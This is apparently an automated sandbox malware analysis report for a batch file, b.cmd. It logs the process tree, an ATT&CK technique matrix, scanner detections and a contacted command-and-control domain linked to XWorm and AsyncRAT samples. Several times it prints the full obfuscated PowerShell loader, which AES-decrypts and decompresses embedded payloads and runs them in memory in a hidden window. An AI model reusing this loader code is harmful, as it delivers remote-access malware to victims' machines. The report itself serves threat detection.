Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC', ''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt', ''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN', ''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU', ''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL', ''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell -w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KStrb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KStrb.Key=[System.Convert]::($rWNT[6])('xA1+WTJaPCUsOeL/aM8gYjpdFXCHAzsSe7O9jqgG6tE=');$KStrb.IV=[System.Convert]::($rWNT[6])('o+k4tdVDsXdevRbseXqo5Q==');$OoABI=$KStrb.($rWNT[2])();$gCRFY=$OoABI.($rWNT[4])($Xyfkn,0,$Xyfkn.Length);$OoABI.Dispose();$KStrb.Dispose();$gCRFY;}function bkQvC($Xyfkn){$pXxPg=New-Object System.IO.MemoryStream(,$Xyfkn);$ztkwM=New-Object System.IO.MemoryStream;$RxDER=New-Object System.IO.Compression.GZipStream($pXxPg,[IO.Compression.CompressionMode]::($rWNT[0]));$RxDER.($rWNT[8])($ztkwM);$RxDER.Dispose();$pXxPg.Dispose();$ztkwM.Dispose();$ztkwM.ToArray();}$QaWhK=[System.IO.File]::($rWNT[10])([Console]::Title);$TOEth=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 5).Substring(2))));$kobGz=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 6).Substring(2))));[System.Reflection.Assembly]::($rWNT[5])([byte[]]$kobGz).($rWNT[7]).($rWNT[3])($null,$null);[System.Reflection.Assembly]::($rWNT[5])([byte[]]$TOEth).($rWNT[7]).($rWNT[3])($null,$null); "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\b.cmd';$rwnt='decpxhcopxhcmppxhcrespxhcspxhc'.replace('pxhc', ''),'matgyrintgyrmtgyrotgyrdtgyrultgyretgyr'.replace('tgyr', ''),'cryskteysktateysktdyskteysktcrysktypyskttoysktryskt'.replace('yskt', ''),'idnlzndnlzvdnlzokdnlzednlz'.replace('dnlz', ''),'tragoiknsfgoikogoikrmfgoikinagoiklblgoikockgoik'.replace('goik', ''),'lostknadstkn'.replace('stkn', ''),'fromxwcmbamxwcse6mxwc4stmxwcrimxwcngmxwc'.replace('mxwc', ''),'enrgyjtrrgyjyrgyjporgyjinrgyjtrgyj'.replace('rgyj', ''),'cqjguopqjguyqjgutqjguoqjgu'.replace('qjgu', ''),'elywteeywtemenywtetaywtetywte'.replace('ywte', ''),'reampxgdlmpxginempxgsmpxg'.replace('mpxg', ''),'ceuhlheuhlangeuhleexeuhlteeuhlnseuhlioneuhl'.replace('euhl', ''),'sklteplikltetklte'.replace('klte', ''),'gzasmetzasmcuzasmrrzasmentzasmprzasmocezasmszasmszasm'.replace('zasm', '');powershell -w hidden;function ogeim($xyfkn){$kstrb=[system.security.cryptography.aes]::create();$kstrb.mode=[system.security.cryptography.ciphermode]::cbc;$kstrb.padding=[system.security.cryptography.paddingmode]::pkcs7;$kstrb.key=[system.convert]::($rwnt[6])('xa1+wtjapcusoel/am8gyjpdfxchazsse7o9jqgg6te=');$kstrb.iv=[system.convert]::($rwnt[6])('o+k4tdvdsxdevrbsexqo5q==');$ooabi=$kstrb.($rwnt[2])();$gcrfy=$ooabi.($rwnt[4])($xyfkn,0,$xyfkn.length);$ooabi.dispose();$kstrb.dispose();$gcrfy;}function bkqvc($xyfkn){$pxxpg=new-object system.io.memorystream(,$xyfkn);$ztkwm=new-object system.io.memorystream;$rxder=new-object system.io.compression.gzipstream($pxxpg,[io.compression.compressionmode]::($rwnt[0]));$rxder.($rwnt[8])($ztkwm);$rxder.dispose();$pxxpg.dispose();$ztkwm.dispose();$ztkwm.toarray();}$qawhk=[system.io.file]::($rwnt[10])([console]::title);$toeth=bkqvc (ogeim ([convert]::($rwnt[6])([system.linq.enumerable]::($rwnt[9])($qawhk, 5).substring(2))));$kobgz=bkqvc (ogeim ([convert]::($rwnt[6])([system.linq.enumerable]::($rwnt[9])($qawhk, 6).substring(2))));[system.reflection.assembly]::($rwnt[5])([byte[]]$kobgz).($rwnt[7]).($rwnt[3])($null,$null);[system.reflection.assembly]::($rwnt[5])([byte[]]$toeth).($rwnt[7]).($rwnt[3])($null,$null); "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\b.cmd';$rwnt='decpxhcopxhcmppxhcrespxhcspxhc'.replace('pxhc', ''),'matgyrintgyrmtgyrotgyrdtgyrultgyretgyr'.replace('tgyr', ''),'cryskteysktateysktdyskteysktcrysktypyskttoysktryskt'.replace('yskt', ''),'idnlzndnlzvdnlzokdnlzednlz'.replace('dnlz', ''),'tragoiknsfgoikogoikrmfgoikinagoiklblgoikockgoik'.replace('goik', ''),'lostknadstkn'.replace('stkn', ''),'fromxwcmbamxwcse6mxwc4stmxwcrimxwcngmxwc'.replace('mxwc', ''),'enrgyjtrrgyjyrgyjporgyjinrgyjtrgyj'.replace('rgyj', ''),'cqjguopqjguyqjgutqjguoqjgu'.replace('qjgu', ''),'elywteeywtemenywtetaywtetywte'.replace('ywte', ''),'reampxgdlmpxginempxgsmpxg'.replace('mpxg', ''),'ceuhlheuhlangeuhleexeuhlteeuhlnseuhlioneuhl'.replace('euhl', ''),'sklteplikltetklte'.replace('klte', ''),'gzasmetzasmcuzasmrrzasmentzasmprzasmocezasmszasmszasm'.replace('zasm', '');powershell -w hidden;function ogeim($xyfkn){$kstrb=[system.security.cryptography.aes]::create();$kstrb.mode=[system.security.cryptography.ciphermode]::cbc;$kstrb.padding=[system.security.cryptography.paddingmode]::pkcs7;$kstrb.key=[system.convert]::($rwnt[6])('xa1+wtjapcusoel/am8gyjpdfxchazsse7o9jqgg6te=');$kstrb.iv=[system.convert]::($rwnt[6])('o+k4tdvdsxdevrbsexqo5q==');$ooabi=$kstrb.($rwnt[2])();$gcrfy=$ooabi.($rwnt[4])($xyfkn,0,$xyfkn.length);$ooabi.dispose();$kstrb.dispose();$gcrfy;}function bkqvc($xyfkn){$pxxpg=new-object system.io.memorystream(,$xyfkn);$ztkwm=new-object system.io.memorystream;$rxder=new-object system.io.compression.gzipstream($pxxpg,[io.compression.compressionmode]::($rwnt[0]));$rxder.($rwnt[8])($ztkwm);$rxder.dispose();$pxxpg.dispose();$ztkwm.dispose();$ztkwm.toarray();}$qawhk=[system.io.file]::($rwnt[10])([console]::title);$toeth=bkqvc (ogeim ([convert]::($rwnt[6])([system.linq.enumerable]::($rwnt[9])($qawhk, 5).substring(2))));$kobgz=bkqvc (ogeim ([convert]::($rwnt[6])([system.linq.enumerable]::($rwnt[9])($qawhk, 6).substring(2))));[system.reflection.assembly]::($rwnt[5])([byte[]]$kobgz).($rwnt[7]).($rwnt[3])($null,$null);[system.reflection.assembly]::($rwnt[5])([byte[]]$toeth).($rwnt[7]).($rwnt[3])($null,$null); "			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	12 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	131 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
b.cmd	5%	Virustotal		Browse
b.cmd	24%	ReversingLabs	Script-BAT.Trojan.Alien

Source	Detection	Scanner	Label	Link
dcxwq1.duckdns.org	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dcxwq1.duckdns.org	101.99.92.203	true	true	12%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000008.00000002.1771404228.000001FCB7943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1756758005.000001FCA7B5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1771404228.000001FCB780D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000008.00000002.1756758005.000001FCA9159000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.1756758005.000001FCA9343000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.1756758005.000001FCA9343000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://go.micro	powershell.exe, 00000008.00000002.1756758005.000001FCA8CB2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000008.00000002.1771404228.000001FCB7943000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1756758005.000001FCA7A65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1771404228.000001FCB780D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000008.00000002.1756758005.000001FCA939E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://oneget.orgX	powershell.exe, 00000008.00000002.1756758005.000001FCA9159000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000008.00000002.1756758005.000001FCA7781000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.o	powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000008.00000002.1756758005.000001FCA7781000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.1756758005.000001FCA9343000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://oneget.org	powershell.exe, 00000008.00000002.1756758005.000001FCA9159000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
101.99.92.203	dcxwq1.duckdns.org	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542729
Start date and time:	2024-10-26 08:50:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	b.cmd
Detection:	MAL
Classification:	mal84.troj.evad.winCMD@15/7@3/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 56% Number of executed functions: 8 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .cmd Override analysis time to 240s for powershell

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
02:51:03	API Interceptor	14918550x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
101.99.92.203	rrwzOU7A9F.exe	Get hash	malicious	XWorm	Browse
	3xlcP3DFLm.exe	Get hash	malicious	XWorm	Browse
	JruZmEO5Dm.exe	Get hash	malicious	XWorm	Browse
	zVlbADkNqu.exe	Get hash	malicious	XWorm	Browse
	vqUuq8t2Uc.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	pXJ9iQvcQa.exe	Get hash	malicious	AsyncRAT, DcRat	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dcxwq1.duckdns.org	rrwzOU7A9F.exe	Get hash	malicious	XWorm	Browse	101.99.92.203
	3xlcP3DFLm.exe	Get hash	malicious	XWorm	Browse	101.99.92.203
	JruZmEO5Dm.exe	Get hash	malicious	XWorm	Browse	101.99.92.203
	zVlbADkNqu.exe	Get hash	malicious	XWorm	Browse	101.99.92.203
	vqUuq8t2Uc.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	101.99.92.203
	pXJ9iQvcQa.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	101.99.92.203
	a.cmd	Get hash	malicious	Unknown	Browse	91.92.249.117

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	rrwzOU7A9F.exe	Get hash	malicious	XWorm	Browse	101.99.92.203
	3xlcP3DFLm.exe	Get hash	malicious	XWorm	Browse	101.99.92.203
	JruZmEO5Dm.exe	Get hash	malicious	XWorm	Browse	101.99.92.203
	zVlbADkNqu.exe	Get hash	malicious	XWorm	Browse	101.99.92.203
	vqUuq8t2Uc.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	101.99.92.203
	pXJ9iQvcQa.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	101.99.92.203
	https://app.adjust.com/mr11ui?fallback=https://abcshopbd.com/#amVmZi5kaXhvbiRhdXN0YWx1c2EuY29t	Get hash	malicious	HTMLPhisher	Browse	111.90.141.53
	Transferencias6231.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	101.99.94.195
	Justificante de pago.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	101.99.94.195
	Justificante de pago.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	101.99.94.195

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9713
Entropy (8bit):	4.940954773740904
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
MD5:	BA7C69EBE30EC7DA697D2772E36A746D
SHA1:	DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
SHA-256:	CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
SHA-512:	E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
Malicious:	false
Reputation:	moderate, very likely benign file
